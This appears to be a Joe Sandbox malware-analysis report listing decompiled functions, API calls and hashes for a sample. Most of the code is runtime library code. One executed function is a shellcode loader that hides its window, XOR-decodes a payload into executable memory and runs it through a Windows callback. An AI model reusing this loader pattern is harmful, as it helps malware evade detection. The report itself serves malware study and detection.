Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669

Uniqueness

Uniqueness Score: -1.00%

Function 0040A93D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040a940
0x0040a946
0x0040a9b9
0x00000000
0x0040a94d
0x0040a94d
0x0040a950
0x0040a96b
0x0040a96e
0x0040a98e
0x0040a9a0
0x0040a970
0x0040a970
0x0040a973
0x00000000
0x0040a975
0x0040a987
0x0040a987
0x0040a973
0x0040a9be
0x0040a9c2
0x0040a952
0x0040a96a
0x0040a96a
0x0040a950

APIs

__cftof_l.LIBCMT ref: 0040A961

Part of subcall function 0040B048: __fltout2.LIBCMT ref: 0040B071

__cftog_l.LIBCMT ref: 0040A987
__cftoe_l.LIBCMT ref: 0040A9B9

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040412D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x413500; // 0x88e7013c
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x414e30 = _t9;
				 *0x414e2c = _t23;
				 *0x414e28 = _t26;
				 *0x414e24 = _t22;
				 *0x414e20 = _t28;
				 *0x414e1c = _t27;
				 *0x414e48 = ss;
				 *0x414e3c = cs;
				 *0x414e18 = ds;
				 *0x414e14 = es;
				 *0x414e10 = fs;
				 *0x414e0c = gs;
				asm("pushfd");
				_pop( *0x414e40);
				 *0x414e34 =  *_t30;
				 *0x414e38 = _v0;
				 *0x414e44 =  &_a4;
				 *0x414d80 = 0x10001;
				_t14 =  *0x414e38; // 0x0
				 *0x414d3c = _t14;
				 *0x414d30 = 0xc0000409;
				 *0x414d34 = 1;
				 *0x414d40 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x413500; // 0x88e7013c
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x413504; // 0x7718fec3
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0040738B(_t19 << 0, "0MA");
			}

0x0040412d
0x0040412d
0x0040412d
0x0040412d
0x0040412d
0x0040412d
0x00404133
0x00404135
0x00404135
0x004073c9
0x004073d3
0x004073da
0x004073de
0x004073df
0x004073df
0x004073e1
0x004073e6
0x004073ec
0x004073f2
0x004073f8
0x004073fe
0x00407404
0x0040740b
0x00407412
0x00407419
0x00407420
0x00407427
0x0040742e
0x0040742f
0x00407438
0x00407440
0x00407448
0x00407453
0x0040745d
0x00407462
0x00407467
0x00407471
0x0040747b
0x00407487
0x0040748b
0x00407497
0x0040749b
0x004074a1
0x004074a7
0x004074ab
0x004074b1
0x004074c2

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
___raise_securityfailure.LIBCMT ref: 004074BA

Strings

0MA, xrefs: 004074B5

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0MA
API String ID: 3761405300-2670099660
Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196E() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x416124;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x416124 = _t3;
				}
				_t4 = E0040456D(_t3, 4);
				 *0x416120 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x413008;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x413288) {
							break;
						}
						_t4 =  *0x416120;
					}
					return 0;
				} else {
					 *0x416124 = _t13;
					_t4 = E0040456D(_t13, 4);
					 *0x416120 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}

0x0040196e
0x00401976
0x00401979
0x00401984
0x00401986
0x00000000
0x00401986
0x0040197b
0x0040197b
0x00401988
0x00401988
0x00401988
0x00401990
0x00401995
0x0040199e
0x004019be
0x004019be
0x004019c0
0x004019c5
0x004019c5
0x004019c8
0x004019cb
0x004019d4
0x00000000
0x00000000
0x004019d6
0x004019d6
0x004019e0
0x004019a0
0x004019a3
0x004019a9
0x004019ae
0x004019b7
0x00000000
0x004019b9
0x004019bb
0x004019bd
0x004019bd
0x004019b7

APIs

__calloc_crt.LIBCMT ref: 00401990
__calloc_crt.LIBCMT ref: 004019A9

Strings

QA, xrefs: 004019C0

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: __calloc_crt
String ID: QA
API String ID: 3494438863-1702331105
Opcode ID: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
Opcode Fuzzy Hash: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C

Uniqueness

Uniqueness Score: -1.00%

Function 004017C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
__invoke_watson.LIBCMT ref: 004017E8

Strings

0Kw, xrefs: 004017CC

Memory Dump Source

Source File: 00000001.00000002.289964197.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.289936903.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.289995064.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.290006359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_jqenyeo.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: 0Kw
API String ID: 4034010525-1246214110
Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ltqmdmdi.exePID: 6696, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1616
Total number of Limit Nodes:	25

Executed Functions

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401000(struct HWND__* __eax, intOrPtr _a8) {
				void* _t8;
				_Unknown_base(*)()* _t20;
				void* _t23;

				_t23 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(__eax, 0); // executed
				_t8 = E0040142D( *((intOrPtr*)(_a8 + 4)), 0x413000);
				_t20 = VirtualAlloc(0, 0x1c32, 0x3000, 0x40);
				E00401381(_t20, 0x1c32, 1, _t8);
				do {
					 *(_t20 + _t23) = ((( *(_t20 + _t23) ^ 0x000000f1) + 0x00000020 ^ 0x000000d6) - 0x0000003b ^ 0x000000f1) + 0x52;
					_t23 = _t23 + 1;
				} while (_t23 < 0x1c32);
				EnumSystemCodePagesW(_t20, 0);
				return 0;
			}

0x00401006
0x00401009
0x00401010
0x00401021
0x00401045
0x00401049
0x00401051
0x00401060
0x00401063
0x00401064
0x0040106b
0x00401077

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 00401009
ShowWindow.USER32(00000000), ref: 00401010

Part of subcall function 0040142D: __wfsopen.LIBCMT ref: 00401438

VirtualAlloc.KERNEL32(00000000,00001C32,00003000,00000040), ref: 00401037
__fread_nolock.LIBCMT ref: 00401049
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 0040106B

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: Window$AllocCodeConsoleEnumPagesShowSystemVirtual__fread_nolock__wfsopen
String ID:
API String ID: 2083855422-0
Opcode ID: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction ID: 77e8c0aaf0c9974a4cee49b3b5cf3efa8b7ee5b121ee9e12007cb8c764029d75
Opcode Fuzzy Hash: 3c289a7e2788801508f1124182579073f029ebc2bbbe1936ee20a837efefdb76
Instruction Fuzzy Hash: BBF07D329403143FFB1027735C8AFDB3F9CD746760F004436FA086A092D574E84246B8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408702 Relevance: 19.6, APIs: 13, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408702(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x413e34; // 0x415054
					if(_t56 != 0) {
						E00404535(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x413e38; // 0x415054
					if(_t57 != 0) {
						E00404535(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x413e3c; // 0x415054
					if(_t58 != 0) {
						E00404535(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x413e40; // 0x415054
					if(_t59 != 0) {
						E00404535(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x413e44; // 0x415054
					if(_t60 != 0) {
						E00404535(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x413e48; // 0x415054
					if(_t61 != 0) {
						E00404535(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x413e4c; // 0x415054
					if(_t62 != 0) {
						E00404535(_t22);
					}
					_t9 = _t54 + 0x38; // 0x8b55c35d
					_t63 =  *_t9 -  *0x413e60; // 0x415058
					if(_t63 != 0) {
						E00404535(_t23);
					}
					_t10 = _t54 + 0x3c; // 0x10ec83ec
					_t64 =  *_t10 -  *0x413e64; // 0x415058
					if(_t64 != 0) {
						E00404535(_t24);
					}
					_t11 = _t54 + 0x40; // 0x758b5653
					_t65 =  *_t11 -  *0x413e68; // 0x415058
					if(_t65 != 0) {
						E00404535(_t25);
					}
					_t12 = _t54 + 0x44; // 0x74f6850c
					_t66 =  *_t12 -  *0x413e6c; // 0x415058
					if(_t66 != 0) {
						E00404535(_t26);
					}
					_t13 = _t54 + 0x48; // 0x105d8b18
					_t67 =  *_t13 -  *0x413e70; // 0x415058
					if(_t67 != 0) {
						E00404535(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x1174db85
					_t15 =  *_t14;
					_t68 = _t15 -  *0x413e74; // 0x415058
					if(_t68 != 0) {
						return E00404535(_t15);
					}
				}
				return _t15;
			}

APIs

_free.LIBCMT ref: 0040871D

Part of subcall function 00404535: HeapFree.KERNEL32(00000000,00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 00404549
Part of subcall function 00404535: GetLastError.KERNEL32(00000000,?,00402F89,00000000,00401466,00411E80,0000000C,0040143D,?,?,00000040,?,00401026,?,00413000), ref: 0040455B

_free.LIBCMT ref: 0040872F
_free.LIBCMT ref: 00408741
_free.LIBCMT ref: 00408753
_free.LIBCMT ref: 00408765
_free.LIBCMT ref: 00408777
_free.LIBCMT ref: 00408789
_free.LIBCMT ref: 0040879B
_free.LIBCMT ref: 004087AD
_free.LIBCMT ref: 004087BF
_free.LIBCMT ref: 004087D1
_free.LIBCMT ref: 004087E3
_free.LIBCMT ref: 004087F5

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction ID: f04fc6fc6f9de8751afe861eb1d73b392140216a2a145ff1f7222b8b789f6bc8
Opcode Fuzzy Hash: c6c0e77dc8294a2ea5e944199d3f13d286ad74d2b3f09fe072b3a39078fcd2db
Instruction Fuzzy Hash: 7B212FB2504304BBC624EF29FDC1C5673F9AA443127A4482EF285F76D5DA78FD808A2C

Uniqueness

Uniqueness Score: -1.00%

Function 0040304B Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040304B(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E004031FA(_t3);
				if(E004044E7() != 0) {
					_t6 = E00403D67(E00402DDC);
					 *0x413508 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E0040456D(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E004030C1();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00403DC3( *0x413508, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00402F98(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E004030C1();
					return 0;
				}
			}

APIs

__init_pointers.LIBCMT ref: 0040304B

Part of subcall function 004031FA: RtlEncodePointer.NTDLL(00000000,?,00403050,0040157E,00411EA0,00000014), ref: 004031FD
Part of subcall function 004031FA: __initp_misc_winsig.LIBCMT ref: 00403218
Part of subcall function 004031FA: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00403E5A
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403E6E
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403E81
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403E94
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403EA7
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00403EBA
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00403ECD
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00403EE0
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00403EF3
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00403F06
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00403F19
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00403F2C
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00403F3F
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00403F52
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00403F65
Part of subcall function 004031FA: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00403F78

__mtinitlocks.LIBCMT ref: 00403050
__mtterm.LIBCMT ref: 00403059

Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0040305E,0040157E,00411EA0,00000014), ref: 00404401
Part of subcall function 004030C1: _free.LIBCMT ref: 00404408
Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A

__calloc_crt.LIBCMT ref: 0040307E
__initptd.LIBCMT ref: 004030A0
GetCurrentThreadId.KERNEL32 ref: 004030A7

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
Opcode Fuzzy Hash: e33af350f6e9ef2e6780073be376e251c14a03b5d83e9ec52140cb940fccbdab
Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C

Uniqueness

Uniqueness Score: -1.00%

Function 0040916C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00405DA9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E004024C9();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
__isleadbyte_l.LIBCMT ref: 004091D0
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234

Strings

.\@, xrefs: 0040916C

Memory Dump Source

Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: .\@
API String ID: 3058430110-2906710320
Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004011BC Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00401B60(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
